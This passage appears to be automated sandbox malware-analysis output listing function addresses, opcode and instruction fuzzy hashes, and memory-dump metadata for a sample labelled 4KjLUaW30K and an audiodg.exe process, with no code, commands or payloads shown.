Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d28b78e8efbccc3c3121954892a707469f1978feea0a813aa67358074bb74342
Instruction ID: 30037ca22c2e1b9d67fc66a335d613245775cda2018eae6ee1facef0d98eeeb6
Opcode Fuzzy Hash: d28b78e8efbccc3c3121954892a707469f1978feea0a813aa67358074bb74342
Instruction Fuzzy Hash: A0116D30D0864E9FEB44EF68C4486BEB7B1FF98341F148A7AE419C2295DB34A591CB84

Function 00007FF848F305D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0af7b96e5672d4bfa006daef6dddc81cb47330269758fe97ca30347dc3b93fc0
Instruction ID: 3e22cb97f566f725d054b2ccdc3bd5f3d6cc704cb4b510d666f99c71e6e19810
Opcode Fuzzy Hash: 0af7b96e5672d4bfa006daef6dddc81cb47330269758fe97ca30347dc3b93fc0
Instruction Fuzzy Hash: 3B019E3090890E8FEB48EF64C4596BAB7A1FF58386F10447EE40EC21D0CB31A590CB44

Function 00007FF848F3B290 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4856ebb3f9f4b1a445fe094684f11e4c837ba52c4700998f0090afedbb6c80db
Instruction ID: 0edfc1b5b832258b0763c1014abd5afa3b6d266a5ce003944c90462ee5a39bf9
Opcode Fuzzy Hash: 4856ebb3f9f4b1a445fe094684f11e4c837ba52c4700998f0090afedbb6c80db
Instruction Fuzzy Hash: 93015A3091990E9EEB84EF68C4592BEBAE0FF18301F11087AE41ED21D0EF31A160C704

Function 00007FF848F3285D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df24e8418ed193a768e824037728e87ffbe9435fb8c1855e8208ba477e45ec2f
Instruction ID: ac96556b6273c4f6c7f8e25df049037e43e1cd956d858e03169e2a4a77080f6b
Opcode Fuzzy Hash: df24e8418ed193a768e824037728e87ffbe9435fb8c1855e8208ba477e45ec2f
Instruction Fuzzy Hash: FB018B3090D64E9FE791FB68848D6B97BE0FF59342F5544B7D408C60A2EF38E0448704

Function 00007FF848F32EF9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 195a48cab6b0e7d7eab7a70178ee0758d09834cd1d51f586afaa2880cb2ee9e7
Instruction ID: 33f19e2150a5437ee5043d860e2bd8bc85ed4b4c8d72675c34205ddc6fc1c6ad
Opcode Fuzzy Hash: 195a48cab6b0e7d7eab7a70178ee0758d09834cd1d51f586afaa2880cb2ee9e7
Instruction Fuzzy Hash: 63018F31D1D6898FE742BB7488595A97FE0EF5A341F0A04F7D408CB0E6EF38A4548711

Function 00007FF848F31CAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07eb91ffe01a84519d5700677f56201e3f27ac035af0eb69775eac53b967e110
Instruction ID: 6eb8b10fbf862a956b6f5fe2ad671d80144273816781a5dcba1723c8543c0806
Opcode Fuzzy Hash: 07eb91ffe01a84519d5700677f56201e3f27ac035af0eb69775eac53b967e110
Instruction Fuzzy Hash: 0201AF3080D68E8FEB99EF6488592FA7BA1FF55341F4414BEE808C22D2DB75D590C744

Function 00007FF848F30608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f71ad91dbcbae29036199fcf164b7c91693443d48c4fc3ad60820341949f027f
Instruction ID: b3ab6964d25e2b05089aa1937083d84e1180e296cd8a9c396f8e610ed562580c
Opcode Fuzzy Hash: f71ad91dbcbae29036199fcf164b7c91693443d48c4fc3ad60820341949f027f
Instruction Fuzzy Hash: E8016930819A0E9EEB49FB64C4582BAB6A2FF18346F10087EE41EC21D1DF35A590CA54

Function 00007FF848F30610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 847c0d24203983371b0ecce8c61e47b00d876fbfc98a9c455f79ce77523c6c81
Instruction ID: f5bca77d50112248a5f8eb5b5273fc89507356a210411df58f091a3a5ac6d1c1
Opcode Fuzzy Hash: 847c0d24203983371b0ecce8c61e47b00d876fbfc98a9c455f79ce77523c6c81
Instruction Fuzzy Hash: B2016930919A0E9FEB49EB6484582BAB6A0FF18346F20087FE40EC21D1DF35A550C604

Function 00007FF848F3AF0A Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebca56c164e31e39cf876197448459280965651cc28141d0aa23ca7a7d6337c3
Instruction ID: 93838456789d27c58d819d88af170bfd5a609a2a04e3e21e4815edfce6010042
Opcode Fuzzy Hash: ebca56c164e31e39cf876197448459280965651cc28141d0aa23ca7a7d6337c3
Instruction Fuzzy Hash: 01F0497095C90E9FEB51FB3884495BABAE0EF18381F0508B3E40DC60A5EF34A5948644

Function 00007FF848F305D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862da456ab318e7007a7b6c8fab8f83fa113c411c35f857156df9146cbc3536b
Instruction ID: 128afa492d85d6e2342dd320b66fce3a11b148186a3000d00c723c435712eeb0
Opcode Fuzzy Hash: 862da456ab318e7007a7b6c8fab8f83fa113c411c35f857156df9146cbc3536b
Instruction Fuzzy Hash: DEF06D3081E64E8FEB85EF6494192FA77A4FF15389F50047AF80DC21D1DB39A5A0CB98

Function 00007FF848F32779 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df6dac96756336d37693f7394d2322a2f0a566dbb2b0a0501b559b8a94ffd1e3
Instruction ID: 5f1a89e8838b99a2d585de98c044f195e54d654c153dc9a6e7536866b176e20b
Opcode Fuzzy Hash: df6dac96756336d37693f7394d2322a2f0a566dbb2b0a0501b559b8a94ffd1e3
Instruction Fuzzy Hash: B0F0623180E78A8FEB5AAF7488592B97BA1FF56342F4504BBD409C61D2DB38A454C741

Function 00007FF848F30FA7 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f003226e96ebf6bfd1290d67e654011933d0b38675e6fa585d2507953e4691
Instruction ID: 9dad7fdebf6d9f0a17d328483d8da59f8c744dd6d61d2513b95630bf0cb1be24
Opcode Fuzzy Hash: e1f003226e96ebf6bfd1290d67e654011933d0b38675e6fa585d2507953e4691
Instruction Fuzzy Hash: 4101E830D096198FEB50FB54C8447EDB7F0EB54341F5042AAD809E7292DF386A848F58

Function 00007FF848F327ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2162cfdcad1582e312cf6ecae12bd1ae6b5aba8bc7264541b0a518b7edfeacb
Instruction ID: 67cda4abcb677e50ebf01ffc3250d9bb16f60c5004b8c20f6bd2534d3bf75017
Opcode Fuzzy Hash: e2162cfdcad1582e312cf6ecae12bd1ae6b5aba8bc7264541b0a518b7edfeacb
Instruction Fuzzy Hash: 45F0BE3080E78E8FEB5AAF6488192F97BA0FF15342F4404BFE809C61E2EB399454C741

Non-executed Functions

Function 00007FF848F39FB5 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ec975eb081a07eb2edf040009908cbf23f2d9e0b7841f88ff3d89f6dbd46e7
Instruction ID: fe17da8d604430b1673322d185e3ad644726e576b721c1cdb8d853ca3dbc7edb
Opcode Fuzzy Hash: 60ec975eb081a07eb2edf040009908cbf23f2d9e0b7841f88ff3d89f6dbd46e7
Instruction Fuzzy Hash: C1D1BCA284E7C15FD7138B749C755917FB0AE27214B0E4ADBC4C0CF4E3E6186A5AD722

Function 00007FF848F3387E Relevance: 5.1, Strings: 4, Instructions: 96COMMON

Download Yara Rule

Strings

/q]I, xrefs: 00007FF848F33924
.q]I, xrefs: 00007FF848F33954
8q], xrefs: 00007FF848F338D4
0q]I, xrefs: 00007FF848F33944

Memory Dump Source

Source File: 00000000.00000002.2112089135.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f30000_4KjLUaW30K.jbxd

Similarity

API ID:
String ID: .q]I$/q]I$0q]I$8q]
API String ID: 0-2422070768
Opcode ID: 1dd03160d67d8ea6793c8124f634c0fa963d9421b2544beccbdff0b31241a05c
Instruction ID: 29038c36c636e69181513e3469ff3fe52e1676a27bd63ec47c7fcfc44a63582c
Opcode Fuzzy Hash: 1dd03160d67d8ea6793c8124f634c0fa963d9421b2544beccbdff0b31241a05c
Instruction Fuzzy Hash: BC31B26281F7D29FE30787B82C249217FA5EF63A50B1941FFD184CB1E7D509890AC352

Analysis Process: audiodg.exePID: 1488, Parent PID: 1068COMMON

Executed Functions

Function 00007FF848F02C10 Relevance: 1.9, Strings: 1, Instructions: 608COMMON

Download Yara Rule

Strings

n4, xrefs: 00007FF848F0AC4C

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID: n4
API String ID: 0-2147382379
Opcode ID: a4f5e9b60c938238fe12238f4613238fe8603ef0acb647fa5e77d5a088a0e99a
Instruction ID: 762a52f69bc5e0a2fcbcba014c08a960e2b0701eb446c11a6adfbf045f5beb43
Opcode Fuzzy Hash: a4f5e9b60c938238fe12238f4613238fe8603ef0acb647fa5e77d5a088a0e99a
Instruction Fuzzy Hash: 71229C3090D68E8FDB86EF28C8596B97BF0FF1A341F1544BAD409C71A2EB38A584C755

Function 00007FF848F0B08D Relevance: .6, Instructions: 566COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c903cd9da369d4c51a49749a379ec3d0890a1c6f83d71e534ea1b721d4510e12
Instruction ID: face26cddd767e3879cb391a52f38e933b745d8e6369b6a02c5dab61667c422a
Opcode Fuzzy Hash: c903cd9da369d4c51a49749a379ec3d0890a1c6f83d71e534ea1b721d4510e12
Instruction Fuzzy Hash: 4212693090D65E8FEB99EB28C8586FABBF1FF59341F1005BAD409D7192DB34A984CB44

Function 00007FF848F03354 Relevance: .5, Instructions: 526COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f20deb3349e0617e32b2c1dbf584698c3c731b94343e7912d6ce4250c92bcecd
Instruction ID: 395a2d6d03a371517e3cc29c122f40ad65152cb00b4f55689256e5da36b827a5
Opcode Fuzzy Hash: f20deb3349e0617e32b2c1dbf584698c3c731b94343e7912d6ce4250c92bcecd
Instruction Fuzzy Hash: A9029D31D1DA8A8FE785EB2888587B9BBE0FF5A340F5401BAC009C72D6EB786945C711

Function 00007FF848F0B0A5 Relevance: .5, Instructions: 458COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2686ae5eea381ff393f4ecaa08ad0a4885d5f4175021ca02b2c0d50b458caea
Instruction ID: c47d41b6c5f9ee77e2424ebf8c37b8d15471665bc905d6fc88275eea8a3a6deb
Opcode Fuzzy Hash: f2686ae5eea381ff393f4ecaa08ad0a4885d5f4175021ca02b2c0d50b458caea
Instruction Fuzzy Hash: BDF17C3090D68A8FEB95EF6488596FA7BF0FF19341F0005BAD409D71D2EB38A984CB55

Function 00007FF848F0B240 Relevance: 1.5, Strings: 1, Instructions: 233COMMON

Download Yara Rule

Strings

N_I, xrefs: 00007FF848F15A04

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID: N_I
API String ID: 0-1668815123
Opcode ID: 71f3fda7d687e4b74e7b064654b45d137c735205b25c09f01b20b00c56ddb92b
Instruction ID: 28e164d2cb500c23abadb9eb3ac9ded7b5fbc00373e6045f7c13cd939487b610
Opcode Fuzzy Hash: 71f3fda7d687e4b74e7b064654b45d137c735205b25c09f01b20b00c56ddb92b
Instruction Fuzzy Hash: 8E71B231E4DA8A8FD785EB6898582B97BB0FF59360F5400BBD009CB1D7DB38B9058781

Function 00007FF848F0AA68 Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

n4, xrefs: 00007FF848F0AC4C

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID: n4
API String ID: 0-2147382379
Opcode ID: 2ca4b869f571a323a8edccd41a439fed2db65b242a35db20a40d4a4753c5e9a2
Instruction ID: c0d79c872bcf825157b05bc0d3457951ee889c7945ed7c339c03abd4240b0525
Opcode Fuzzy Hash: 2ca4b869f571a323a8edccd41a439fed2db65b242a35db20a40d4a4753c5e9a2
Instruction Fuzzy Hash: 92519071D1D68E8FEB56AF6488252FD7BE0FF06340F0505BAE808C21D2EB38A594C755

Function 00007FF848F0CDC0 Relevance: 1.2, Instructions: 1194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3897dfaf312d0151d41fb6cd132faa1885b127bd4e98efcc2889cb1edd4cc6
Instruction ID: 81f6e351ca82c7f2ef6212dc40d501eaeac6e2fdb2d15ac2196b0f74f20eeb47
Opcode Fuzzy Hash: 3c3897dfaf312d0151d41fb6cd132faa1885b127bd4e98efcc2889cb1edd4cc6
Instruction Fuzzy Hash: 0161AF3086DA8D8FEB46EB34C8696BA7BA0FF1A341F4504BAD40AC70D2DB35A944C751

Function 00007FF848F02C70 Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 755cdc2c237a20e4601091e5d7dcfc298d175f141c4eaf14ce84198cdc264e66
Instruction ID: 99136365d4c0ecacbca82db43230f9483288d63dc6e46a82ff29d5b9b3d1a53a
Opcode Fuzzy Hash: 755cdc2c237a20e4601091e5d7dcfc298d175f141c4eaf14ce84198cdc264e66
Instruction Fuzzy Hash: D6D1A03190D64A8FE742FBA888586FA7BE0FF1A391F0445B6D408C71E2EF38A5448765

Function 00007FF848F005A0 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f80293476609c7618bbee07b1196890bfff4e477b8afa777e137f87a7163647f
Instruction ID: 77be982ced02de0d4aff9f5db24fe1c5006a99a29b29c075a33c30e89c3ec619
Opcode Fuzzy Hash: f80293476609c7618bbee07b1196890bfff4e477b8afa777e137f87a7163647f
Instruction Fuzzy Hash: 58A1DA62D0F5C29EF355777868151FA2FA0FF937A8F0902B7D4888A0D7EE1C5449839A

Function 00007FF848F00640 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8bd0ff9f419093bcc3ac74b0a6867b49a4d94202bd40a01be462d873db59f81
Instruction ID: 41bd9f8b8a9f56fb60e73bee31a90122246968d0f12a0040be4938d5fb4b79db
Opcode Fuzzy Hash: b8bd0ff9f419093bcc3ac74b0a6867b49a4d94202bd40a01be462d873db59f81
Instruction Fuzzy Hash: B5A1D572E0E5C29EF355B77868155B93BE0FF92398F0902B7D448CA0D7EA2C9445835A

Function 00007FF848F005ED Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 568fa1742b878f213b00b2b2a29a98a3d059c4fddd98f71e63cab43dd8f16f89
Instruction ID: fd534d3dd57bb2f026c475797f6bc48fbaaa463f3435c34d1e2157919326860e
Opcode Fuzzy Hash: 568fa1742b878f213b00b2b2a29a98a3d059c4fddd98f71e63cab43dd8f16f89
Instruction Fuzzy Hash: F4A1F862E0F5C29FF355777868151FA3FA0FF927A8F0902B7D4488A0D7EA1C5409939A

Function 00007FF848F00615 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e3936e54cad5c029b62d1dace9e436aa1fc1d3fa267b23e2fe3d4885573601
Instruction ID: 0e3c80a9f400c11817a0cbf0ee0b57e43d49559c80e16f5fc36e003308675e26
Opcode Fuzzy Hash: 28e3936e54cad5c029b62d1dace9e436aa1fc1d3fa267b23e2fe3d4885573601
Instruction Fuzzy Hash: D891FA62D0F5C29FF355777868151FA2FA0FF937A8F0902B7D4488A0D7EA1C5849839A

Function 00007FF848F02145 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bbf9b3d35e82feaa53075d0d63b3778c0fc0506403fd48c6bc047320a1ecf0f
Instruction ID: 7295c0537831b561da6c8eaecf134ed48ee5c88a02e4c42793da4a065394b4f3
Opcode Fuzzy Hash: 7bbf9b3d35e82feaa53075d0d63b3778c0fc0506403fd48c6bc047320a1ecf0f
Instruction Fuzzy Hash: BDA1EE30D0D65A8FEB66EBA4C8557B8B7A0FF46380F0401BAD04DD71D2EF3869458B69

Function 00007FF848F01BE5 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbd11201802c37649bcb96f4573541967847ec4d6adb36272478fd51809cccf
Instruction ID: 328a600252406183d6bb31ddb9d34f4ebf59faff66777bb3cd2366adff46c26f
Opcode Fuzzy Hash: fcbd11201802c37649bcb96f4573541967847ec4d6adb36272478fd51809cccf
Instruction Fuzzy Hash: 5091F431A0DA8A8FDB59EF2888551BA7BE1FF96300F0441BED449C72D2EB34A845C745

Function 00007FF848F016D8 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f062685174d3ce3ad686dafc9fd983a19da7e95c7809fec56be0e379b23a10b
Instruction ID: 25dc83d416c996bb7d5b991cf02997a0822b9263943f80e63e20b2ce1996db66
Opcode Fuzzy Hash: 6f062685174d3ce3ad686dafc9fd983a19da7e95c7809fec56be0e379b23a10b
Instruction Fuzzy Hash: 3281CE31A0CA4A8FDB58EF1C88515BA77E2FF9A344F14457AE44EC32C2DF34A8428785

Function 00007FF848F02A30 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f684a0f6a8a3f26ced0297430eeca46f4d8e085d890d88ec752908a29040910b
Instruction ID: 3d7e33223c552b3eefed9c4b7c7a0758e1982ded36d4914145d972a8c4ca6ebf
Opcode Fuzzy Hash: f684a0f6a8a3f26ced0297430eeca46f4d8e085d890d88ec752908a29040910b
Instruction Fuzzy Hash: DEA18830D0CA4A8FEB55EB64C8582FDBBF0EF09350F0404BAD009D61D6DB38A988CB59

Function 00007FF848F005F0 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4332a64a81fb2f478026398e88e654a742c4296592c5d986252609398e638132
Instruction ID: d45ebb0652d03a6dbbfeb16e44394f9c4d2a1bf75ae03a8eb783a137217ec804
Opcode Fuzzy Hash: 4332a64a81fb2f478026398e88e654a742c4296592c5d986252609398e638132
Instruction Fuzzy Hash: AD81B030A1DA8A8FDB49EF2888555BA77E2FF99340F10457ED40AC72D2DF34A882C745

Function 00007FF848F00A01 Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b17b1d4dd18f10b9259f7512ee964a95b294abdc1f4e4b7c3159a0f7c1cbfd9
Instruction ID: a4d09ff511f1297eadacae64bc2d00d41b699ab97c1740759c478c394b6c5805
Opcode Fuzzy Hash: 0b17b1d4dd18f10b9259f7512ee964a95b294abdc1f4e4b7c3159a0f7c1cbfd9
Instruction Fuzzy Hash: 1381AB30D0D68A8FEB51FB2488596FA7BE0FF9A345F0445BAD808D70D2FB38A5448B05

Function 00007FF848F0B0FD Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf72aa5cca005cc88eebe4085f731fb383332d871b2d8eabf13807ace7fc617
Instruction ID: abb2e67a40e9e5e10a0be6a5404209deca3a899e395478ef0a5b07dafe3d44c5
Opcode Fuzzy Hash: 5cf72aa5cca005cc88eebe4085f731fb383332d871b2d8eabf13807ace7fc617
Instruction Fuzzy Hash: 8B915A3090D78E8FEB95EF2888596AA7BF0FF15341F0005BAD818D6192EB38A994C745

Function 00007FF848F03085 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b612ac6bb9c5a46f1f187b7f648af657e7cfe606f7c4fb3a844c2d205a5ed29
Instruction ID: ee4582d36e7a6a5bb03b7cffd53f92f128058070cf7b422e376901c69e9d5640
Opcode Fuzzy Hash: 7b612ac6bb9c5a46f1f187b7f648af657e7cfe606f7c4fb3a844c2d205a5ed29
Instruction Fuzzy Hash: 4C816630D0D64A8FEB51EBA8C8586EDBBF0EF5A341F0440BAD009D71D2EB38A944CB54

Function 00007FF848F005D0 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.2158633085.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ff848f00000_audiodg.jbxd

Similarity

API ID:
String ID:
API String ID:
